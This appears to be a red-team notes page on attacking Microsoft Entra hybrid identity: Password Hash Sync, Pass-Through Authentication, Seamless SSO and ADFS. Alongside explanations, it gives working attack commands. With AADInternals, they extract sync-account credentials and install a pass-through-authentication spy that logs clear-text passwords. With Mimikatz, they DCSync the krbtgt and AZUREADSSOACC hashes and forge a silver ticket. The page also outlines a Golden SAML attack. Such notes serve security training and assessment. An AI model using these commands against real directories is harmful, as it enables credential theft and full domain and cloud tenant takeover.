Hybrid Identity

Organizations have resources, devices and applications both on-premises and in the cloud. Many enterprises se their on-prem AD identities to access Azure applications to avoid managing separate identities on both.

Entra Connect

An on-premises AD can be integrated with Entra ID using Entra Connect with the following methods. Every method supports Single Sign-on (SSO):

  • Password Hash Sync (PHS)

  • Pass-Through Authentication (PTA)

  • Federation

PHS (Password Hash Sync)

It syncs users and a hash of their password hashes (not clear-text or original hashes) for on-prem AD to Entra ID. This is the simplest and most popular method for getting a hybrid identity.

PHS is required for features like identity protection and AAD domain services

By default, password expiry and account expiry are not reflected in Entra ID. That means a user whose on-prem password is expired, can continue to access Azure resources using the old password.

For on-prem an account with the name MSOL_<installationID>is automatically created. This account has replication (DCSync) permissions in the on-prem AD.

Enumerate MSOL users:

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

Once the Entra connect server is compromised. Use the below commands from the AADInternals module. Extract credentials of the MSOL_* and Sync_* accounts in clear text:

Import-Module AADInternals\AADInternals.psd1

Get-AADIntSyncCredentials

Using the creds of MSOL_* account, we can run DCSync against the on- prem AD:

runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command '"lsadump::dcsync/user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

PTA (Pass-through Authentication)

Microsoft Entra pass-through authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.

If we compromise a server with the authentication agent running, we can get the credentials for users in plain-text. We will first need to upload AADInternals.zip https://github.com/Gerenios/AADInternals. Next, unzip it and run :

Import-Module AADInternals\AADInternals.psd1

Install the PTA agent and collect credentials.

Install-AADIntPTASpy

All passwords are now accepted and credentials collected to
C:\PTASpy\PTASpy.csv

# Get clear-text passwords from users authenticating
Get-AADIntPTASpyLog

Seamless SSO

Entra Seamless SSO automatically signs users in when they are on-prem domain-joined machine. There is no need to use passwords to log in to Entra ID and on-prem application. On on-prem AD a user AZUREADSSOACCIs created. This account's Kebreros decryption key is shared with entra ID.

This means that if we can compromise the NTLM hash of the machine account, we can create silver tickets for any synced on-prem user.

First get NTLM hash

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

We just need the userPrincipalName and SID of the user to create the Silver ticket that can be used from any machine connected to the internet.

Create silver ticket:

Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'

Federation

In case of federationa trust is established between unrelated parties like on-premise AD and Entra ID. Users can access cloud applications by using their on-prem credentials.

ADFS

AD FS is a claimed-based identity model. Claims are simply statements (for example name, identity, groupp), made about users that are used primarily for authorizing access to claim-based applications located anywhere on the internet.

A user is identified by ImmutableID. It is globally unique and stored in Entra ID. The ImmuatbleID is stored on-prem as ms-DS-ConsistencyGuidfor the user and/or can be derived from the GUID of the user

Golden SAML attack

In ADFS, A SAML response is signed by a token-signing certificate. If the certificate is compromised, it is possible to authenticate to the Entra ID as ANY user in Entra ID. The certificate can be extracted from the AD FS server with Domain Admin privileges and then can be used from the internet connectd machine.

Last updated